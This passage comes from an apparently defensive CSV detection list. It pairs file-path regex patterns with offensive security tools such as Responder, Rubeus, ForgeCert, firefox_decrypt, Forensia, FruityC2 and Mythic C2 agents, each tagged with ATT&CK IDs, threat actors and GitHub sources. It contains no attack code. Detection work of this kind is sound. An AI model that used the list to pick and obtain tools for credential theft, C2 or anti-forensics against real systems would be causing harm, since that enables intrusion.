- BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/FindObjects-BOF","1","1","N/A","N/A","10","10","268","47","2023-05-03T19:52:08Z","2021-01-11T09:38:52Z","7206"
"*/FindSQLSrv.py*",".{0,1000}\/FindSQLSrv\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","7207"
"*/finger.nse*",".{0,1000}\/finger\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7208"
"*/fingerprint-strings.nse*",".{0,1000}\/fingerprint\-strings\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7209"
"*/firefox_decrypt.git*",".{0,1000}\/firefox_decrypt\.git.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","N/A","10","10","2172","317","2024-11-08T13:52:34Z","2014-01-17T13:25:02Z","7210"
"*/firefox_decrypt.py*",".{0,1000}\/firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","7211"
"*/firewalk.nse*",".{0,1000}\/firewalk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7212"
"*/firewall-bypass.nse*",".{0,1000}\/firewall\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7213"
"*/flask:5000/supershell/*",".{0,1000}\/flask\:5000\/supershell\/.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","7214"
"*/flatten-macho.m*",".{0,1000}\/flatten\-macho\.m.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","7215"
"*/flume-master-info.nse*",".{0,1000}\/flume\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7220"
"*/Fodetect-hooksx64*",".{0,1000}\/Fodetect\-hooksx64.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","7221"
"*/follina.py*",".{0,1000}\/follina\.py.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z","7222"
"*/follow_attacker_commands.py*",".{0,1000}\/follow_attacker_commands\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","7223"
"*/Forensia.exe*",".{0,1000}\/Forensia\.exe.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7224"
"*/Forensia.git*",".{0,1000}\/Forensia\.git.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7225"
"*/forensia.pdb*",".{0,1000}\/forensia\.pdb.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7226"
"*/Forensia/releases/download/ReleaseX64/*",".{0,1000}\/Forensia\/releases\/download\/ReleaseX64\/.{0,1000}","offensive_tool_keyword","Forensia","Anti Forensics Tool For Red Teamers - Used For Erasing Some Footprints In The Post Exploitation Phase","T1070.001 - T1070.002 - T1070.004 - T1070.006 - T1070.009 - T1564.004 - T1553.002 - T1027","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/PaulNorman01/Forensia","1","1","N/A","N/A","10","8","755","75","2023-06-23T23:23:22Z","2022-12-07T14:45:52Z","7227"
"*/Forensike.git*",".{0,1000}\/Forensike\.git.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","7228"
"*/Forensike.ps1*",".{0,1000}\/Forensike\.ps1.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","7229"
"*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ForgeCert","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7230"
"*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","7231"
"*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ForgeCert","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","7232"
"*/ForgeCert.exe*",".{0,1000}\/ForgeCert\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","7233"
"*/ForgeCert.git*",".{0,1000}\/ForgeCert\.git.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001 - T1649","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","1","N/A","N/A","10","7","671","109","2024-08-17T16:40:07Z","2021-06-09T22:04:18Z","7234"
"*/forkatz.filters*",".{0,1000}\/forkatz\.filters.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","7235"
"*/forkatz.git*",".{0,1000}\/forkatz\.git.{0,1000}","offensive_tool_keyword","forkatz","credential dump using foreshaw technique using SeTrustedCredmanAccessPrivilege","T1003.002 - T1558.002 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/Barbarisch/forkatz","1","1","N/A","N/A","10","2","124","16","2021-05-22T00:23:04Z","2021-05-21T18:42:22Z","7236"
"*/ForkDump.cpp*",".{0,1000}\/ForkDump\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7237"
"*/ForkLib.cpp*",".{0,1000}\/ForkLib\.cpp.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7238"
"*/ForkPlayground.git*",".{0,1000}\/ForkPlayground\.git.{0,1000}","offensive_tool_keyword","ForkPlayground","proof-of-concept of Process Forking.","T1055 - T1003","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/D4stiny/ForkPlayground","1","1","N/A","N/A","7","3","226","33","2021-11-29T21:42:43Z","2021-11-26T04:21:46Z","7239"
"*/format:hashcat*",".{0,1000}\/format\:hashcat.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","7240"
"*/FormThief.git*",".{0,1000}\/FormThief\.git.{0,1000}","offensive_tool_keyword","FormThief","Spoofing desktop login applications with WinForms and WPF","T1204.002 - T1056.004 - T1071.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/mlcsec/FormThief","1","1","N/A","N/A","8","2","173","31","2024-02-19T22:40:09Z","2024-02-19T22:34:07Z","7241"
"*/forwardedemails.txt*",".{0,1000}\/forwardedemails\.txt.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","7242"
"*/FourEye.git*",".{0,1000}\/FourEye\.git.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","1","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","7243"
"*/fox-info.nse*",".{0,1000}\/fox\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7244"
"*/fox-it/BloodHound*",".{0,1000}\/fox\-it\/BloodHound.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","7245"
"*/Free porn.exe*",".{0,1000}\/Free\sporn\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7246"
"*/freelancer-info.nse*",".{0,1000}\/freelancer\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7253"
"*/Freeze.rs*",".{0,1000}\/Freeze\.rs.{0,1000}","offensive_tool_keyword","Freeze.rs","Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST","T1548.004","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/optiv/Freeze.rs","1","1","N/A","N/A","N/A","8","716","84","2023-08-18T17:26:44Z","2023-05-03T16:04:47Z","7254"
"*/freyja.go*",".{0,1000}\/freyja\.go.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","7255"
"*/freyja_tcp/*",".{0,1000}\/freyja_tcp\/.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","7256"
"*/fritzone/obfy*",".{0,1000}\/fritzone\/obfy.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","N/A","7","678","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z","7257"
"*/frpc.exe*",".{0,1000}\/frpc\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7269"
"*/fruityc2.crt*",".{0,1000}\/fruityc2\.crt.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7273"
"*/FruityC2.git*",".{0,1000}\/FruityC2\.git.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7274"
"*/fruityc2.key*",".{0,1000}\/fruityc2\.key.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7275"
"*/fruityc2.pem*",".{0,1000}\/fruityc2\.pem.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#linux","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7276"
"*/FruityC2/archive/master.zip*",".{0,1000}\/FruityC2\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7277"
"*/FruityC2/releases/*",".{0,1000}\/FruityC2\/releases\/.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7278"
"*/FruityC2-Client*",".{0,1000}\/FruityC2\-Client.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","7279"
"*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7280"
"*/fscan.exe*",".{0,1000}\/fscan\.exe.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7281"
"*/fscan.git*",".{0,1000}\/fscan\.git.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7282"
"*/fscan/releases/download/*",".{0,1000}\/fscan\/releases\/download\/.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","1","N/A","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","7283"
